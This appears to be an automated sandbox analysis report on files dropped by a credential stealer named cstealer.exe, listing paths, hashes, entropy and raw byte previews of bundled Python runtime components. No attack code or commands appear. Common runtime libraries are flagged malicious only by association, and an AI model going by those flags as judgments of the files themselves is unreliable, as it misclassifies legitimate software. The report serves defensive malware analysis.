                                                                                                                                                          SHA-512:3B37C27825CA85BF96E28BB2F7545A29BA595E19E8D78C9C1912CBC4EB7349CC3F9B52A466D0E7FB537E646AB2BB1F704D2B59389ABEA5F4C2733DA74F3A3380
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..^W..^W..^W..W/M.\W..K(..\W.../..\W..K(..UW..K(..VW..K(..]W.."..]W..^W...W..g..._W..g..._W..g.!._W..g..._W..Rich^W..........................PE..d....yLe.........." ...%.H...H.......M....................................................`..........................................r..d...tr..d...................................`k.............................. j..@............`...............................text....G.......H.................. ..`.rdata...!...`..."...L..............@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\VCRUNTIME140.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98736
                                                                                                                                                          Entropy (8bit):6.474996871326343
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BxhUQePlHhR46rXHHGI+mAAD4AeDuXMycecb8i10DWZz:Bvk4wHH+mZD4ADAecb8G1
                                                                                                                                                          MD5:F12681A472B9DD04A812E16096514974
                                                                                                                                                          SHA1:6FD102EB3E0B0E6EEF08118D71F28702D1A9067C
                                                                                                                                                          SHA-256:D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
                                                                                                                                                          SHA-512:7D3ACCBF84DE73FB0C5C0DE812A9ED600D39CD7ED0F99527CA86A57CE63F48765A370E913E3A46FFC2CCD48EE07D823DAFDD157710EEF9E7CC1EB7505DC323A2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.&k..H8..H8..H8.I9..H8...8..H8..I8(.H8e.K9..H8e.L9..H8e.M9..H8e.H9..H8e..8..H8e.J9..H8Rich..H8................PE..d....9............" ... .....`......`.....................................................`A........................................0C..4...dK...............p..p....Z...'...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......B..............@....pdata..p....p.......F..............@..@_RDATA..\............R..............@..@.rsrc................T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_bz2.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):83328
                                                                                                                                                          Entropy (8bit):6.532254531979707
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123768
                                                                                                                                                          Entropy (8bit):6.017133084000375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                          MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                          SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                          SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                          SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):251768
                                                                                                                                                          Entropy (8bit):6.543870948107038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                          MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                          SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                          SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                          SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):63872
                                                                                                                                                          Entropy (8bit):6.166853300594844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                          MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                          SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                          SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                          SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):78200
                                                                                                                                                          Entropy (8bit):6.239347454910878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                          MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                          SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                          SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                          SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.l...........%.......................................P......h.....`.........................................@...P............0....... ..x.......x)...@..........T...............................@............................................text....k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_sqlite3.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):118656
                                                                                                                                                          Entropy (8bit):6.2256831065058815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                          MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                          SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                          SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                          SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\certifi\cacert.pem

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\libffi-8.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI86682\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
